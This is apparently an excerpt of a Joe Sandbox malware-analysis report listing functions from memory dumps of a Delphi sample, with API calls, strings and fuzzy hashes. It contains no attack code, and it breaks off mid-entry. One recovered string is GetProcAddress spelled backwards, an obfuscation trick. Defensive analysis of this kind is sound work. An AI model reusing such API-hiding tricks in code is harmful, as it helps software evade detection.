                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                Function 02ECD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02ECD29D
                                                                                                                  • Part of subcall function 02ECD268: GetProcAddress.KERNEL32(00000000), ref: 02ECD281
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                • API String ID: 1646373207-1918263038
                                                                                                                • Opcode ID: 46720d6af40eb80de5c160c542ad644d69e9570e176cdf667edc487220a61c79
                                                                                                                • Instruction ID: 9c9d37ce4db481b5e8c6673ce17d66fc8906e70acd30d52185f0f38d7a04d169
                                                                                                                • Opcode Fuzzy Hash: 46720d6af40eb80de5c160c542ad644d69e9570e176cdf667edc487220a61c79
                                                                                                                • Instruction Fuzzy Hash: DF41C1A59C820C5A51086AED7F0242BF7DED6556503B0F52EB808CB744DA72FD53CE29
                                                                                                                Function 02ED6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02ED6EDE
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02ED6EEF
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02ED6EFF
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02ED6F0F
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02ED6F1F
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02ED6F2F
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02ED6F3F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                • API String ID: 667068680-2233174745
                                                                                                                • Opcode ID: 4319cb374ddee86273b1deb78aa873f000f4289aadd785d17c1488d393b5a4c0
                                                                                                                • Instruction ID: d7a3ac83bb7069b9445ef5e3f5b986359360f40927b63ff30a4574e71e3596f3
                                                                                                                • Opcode Fuzzy Hash: 4319cb374ddee86273b1deb78aa873f000f4289aadd785d17c1488d393b5a4c0
                                                                                                                • Instruction Fuzzy Hash: 0DF0ACE0AC8740BDFE00BFB36D81827375EAA60658364FC1DB80B6D542F775A4528F11
                                                                                                                Function 02EC2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02EC28CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                • API String ID: 2030045667-32948583
                                                                                                                • Opcode ID: 27dcca4c3c1b1a3478bab3c3faa187139dcaff77ccc975ced24ed4bc3c3544e0
                                                                                                                • Instruction ID: 88ac25db3d28971cd3ac5741b2c2bb74fbec2cf9325552298489857f5fff2320
                                                                                                                • Opcode Fuzzy Hash: 27dcca4c3c1b1a3478bab3c3faa187139dcaff77ccc975ced24ed4bc3c3544e0
                                                                                                                • Instruction Fuzzy Hash: 3DA10730A443548BDB21AAACCD84BD976E5EB09314F20A0E9EE499B341CF758987CF51
                                                                                                                Function 02EC252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • An unexpected memory leak has occurred. , xrefs: 02EC2690
                                                                                                                • bytes: , xrefs: 02EC275D
                                                                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02EC2849
                                                                                                                • , xrefs: 02EC2814
                                                                                                                • 7, xrefs: 02EC26A1
                                                                                                                • The unexpected small block leaks are:, xrefs: 02EC2707
                                                                                                                • Unexpected Memory Leak, xrefs: 02EC28C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                • API String ID: 0-2723507874
                                                                                                                • Opcode ID: 428a3959e45dfdb0197953dc4dda211ac269b4507dd19fa3c36384745f392b78
                                                                                                                • Instruction ID: 984e3f64be079c3514f6eeb46a762bde58b1523fef90d48983d6113e8974c60f
                                                                                                                • Opcode Fuzzy Hash: 428a3959e45dfdb0197953dc4dda211ac269b4507dd19fa3c36384745f392b78
                                                                                                                • Instruction Fuzzy Hash: 4C71E630A442588FDF21EAACCD84BD8BAE5EB09314F20A0E9EA49D7241CF7549C7CF51
                                                                                                                Function 02ECBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32(00000000,02ECC08B,?,?,00000000,00000000), ref: 02ECBDF6
                                                                                                                  • Part of subcall function 02ECA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                • API String ID: 4232894706-2493093252
                                                                                                                • Opcode ID: 2165ec06cf5f8b9d097ee38797d69c31230116c9f0f46855b2f16e57d8b7f483
                                                                                                                • Instruction ID: 72bc1ad72a4fa82e8610b6e712c01ad810121d4ace961ca66cd89280387bfa45
                                                                                                                • Opcode Fuzzy Hash: 2165ec06cf5f8b9d097ee38797d69c31230116c9f0f46855b2f16e57d8b7f483
                                                                                                                • Instruction Fuzzy Hash: C6612D74A801485BDB00EBE4DA61A9FB7BBAB89304F70F43DB1019B785CA39D917CB51
                                                                                                                Function 02EDAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDB000
                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02EDB017
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDB0AB
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000002), ref: 02EDB0B7
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 02EDB0CB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Read$HandleModule
                                                                                                                • String ID: KernelBase$LoadLibraryExA
                                                                                                                • API String ID: 2226866862-113032527
                                                                                                                • Opcode ID: 3aa675054f5ace751513ee02b93874a79e9c97d5a1192fe11213c63fd25eb66b
                                                                                                                • Instruction ID: 03047db4ae67e66c6b3e99b18548a1dcf9651a25e039249c49b4ed95e6294d14
                                                                                                                • Opcode Fuzzy Hash: 3aa675054f5ace751513ee02b93874a79e9c97d5a1192fe11213c63fd25eb66b
                                                                                                                • Instruction Fuzzy Hash: 32318471680305FBDB20DBA9CC85F5A77A8AF0535CF41D118FA549B2C0E371A902CB60
                                                                                                                Function 02EC435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?,02F467C8,?,?,02EEE7A8,02EC65B1,02EED30D), ref: 02EC4395
                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?,02F467C8,?,?,02EEE7A8,02EC65B1,02EED30D), ref: 02EC439B
                                                                                                                • GetStdHandle.KERNEL32(000000F5,02EC43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?,02F467C8), ref: 02EC43B0
                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,02EC43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?), ref: 02EC43B6
                                                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02EC43D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleWrite$Message
                                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                                • API String ID: 1570097196-2970929446
                                                                                                                • Opcode ID: c63bc60d2f54281a9bbd1464ccb0d1adcd4f7a11b3b6b2409bfcd9aca4990ef0
                                                                                                                • Instruction ID: 0c15e8128244205480b2bab8bd9d85314b1d83e9430c077cbb14ea22eb53b5b2
                                                                                                                • Opcode Fuzzy Hash: c63bc60d2f54281a9bbd1464ccb0d1adcd4f7a11b3b6b2409bfcd9aca4990ef0
                                                                                                                • Instruction Fuzzy Hash: 8FF02464AC430479FB10B2E86E06F59379C1784F79F34EA0DB725AC0C287E880D68B32
                                                                                                                Function 02ECAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ECAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02ECAD59
                                                                                                                  • Part of subcall function 02ECAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02ECAD7D
                                                                                                                  • Part of subcall function 02ECAD3C: GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02ECAD98
                                                                                                                  • Part of subcall function 02ECAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02ECAE2E
                                                                                                                • CharToOemA.USER32(?,?), ref: 02ECAEFB
                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF18
                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF1E
                                                                                                                • GetStdHandle.KERNEL32(000000F4,02ECAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF33
                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,02ECAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF39
                                                                                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02ECAF5B
                                                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02ECAF71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 185507032-0
                                                                                                                • Opcode ID: c04780ac3ef6eb8cad2fa1810443eaeda3b105791c899744b6ed528d45fc2182
                                                                                                                • Instruction ID: 859750dfbe070f0f36c87b7eb6f48f85da7785605a66cd7f9a46dfdcc4d6f3e8
                                                                                                                • Opcode Fuzzy Hash: c04780ac3ef6eb8cad2fa1810443eaeda3b105791c899744b6ed528d45fc2182
                                                                                                                • Instruction Fuzzy Hash: A61194B25843086AD300FBD4CE40F9F77ED5B41700F60993DBB44D61E0DA74E5518B62
                                                                                                                Function 02ECE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02ECE625
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02ECE641
                                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02ECE67A
                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02ECE6F7
                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02ECE710
                                                                                                                • VariantCopy.OLEAUT32(?,00000000), ref: 02ECE745
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 351091851-0
                                                                                                                • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                • Instruction ID: 507ef0da76867e74d3284492307fd41fbf420d5dc3a7631cfb26f966c1271348
                                                                                                                • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                • Instruction Fuzzy Hash: A651107595162D9BCB26DF98CE80BD9B3BDAF49314F1491E9F508E7201D630AF828F60
                                                                                                                Function 02EC3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EC35BA
                                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02EC3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EC35ED
                                                                                                                • RegCloseKey.ADVAPI32(?,02EC3610,00000000,?,00000004,00000000,02EC3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EC3603
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                • API String ID: 3677997916-4173385793
                                                                                                                • Opcode ID: 85a3cdf82bc2f67922a995cd151f52c66e029a7058c07b591629ca02c1f791bd
                                                                                                                • Instruction ID: eb21683d4c0f201778fa253aea498386c1cabe3d9b14c3965720e249e5919932
                                                                                                                • Opcode Fuzzy Hash: 85a3cdf82bc2f67922a995cd151f52c66e029a7058c07b591629ca02c1f791bd
                                                                                                                • Instruction Fuzzy Hash: 3101F9759C0208FAEB10EBD08E02BB973ECD708710F6084A5BA04D6780E2749911DA59
                                                                                                                Function 02ED8274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: Kernel32$sserddAcorPteG
                                                                                                                • API String ID: 667068680-1372893251
                                                                                                                • Opcode ID: 559dcbaac8b3f0770f725224e4ce8cf92717593111961dd1ec9af284ac84a0d6
                                                                                                                • Instruction ID: e3f7751672431b2bf979270a9fbe2b6450adf2cd45e4d1c81ad897d7eef1b0ea
                                                                                                                • Opcode Fuzzy Hash: 559dcbaac8b3f0770f725224e4ce8cf92717593111961dd1ec9af284ac84a0d6
                                                                                                                • Instruction Fuzzy Hash: 34014F786C0308AFEB14FBA4DD51E6AB7FEEB49B00F61D464B804D7640DA70A902CA24
                                                                                                                Function 02ECAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02ECAAE7,?,?,00000000), ref: 02ECAA68
                                                                                                                  • Part of subcall function 02ECA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02ECAAE7,?,?,00000000), ref: 02ECAA98
                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02ECAAA3
                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02ECAAE7,?,?,00000000), ref: 02ECAAC1
                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02ECAACC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                • String ID:
                                                                                                                • API String ID: 4102113445-0
                                                                                                                • Opcode ID: eb2d8ed69b50103d8b4187d33cd447c6e4246dafcb8e7366f13312f05eb70aa4
                                                                                                                • Instruction ID: 6c5c8fa04c7fb66bcc150a29b0da827eca27bf6e1939c2e5d9d0617b477e9d63
                                                                                                                • Opcode Fuzzy Hash: eb2d8ed69b50103d8b4187d33cd447c6e4246dafcb8e7366f13312f05eb70aa4
                                                                                                                • Instruction Fuzzy Hash: 080124B02C02086BFA11BFE4CF12B5B335DDB81B14F70E138F000A67C0D6648E128A24
                                                                                                                Function 02ECAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
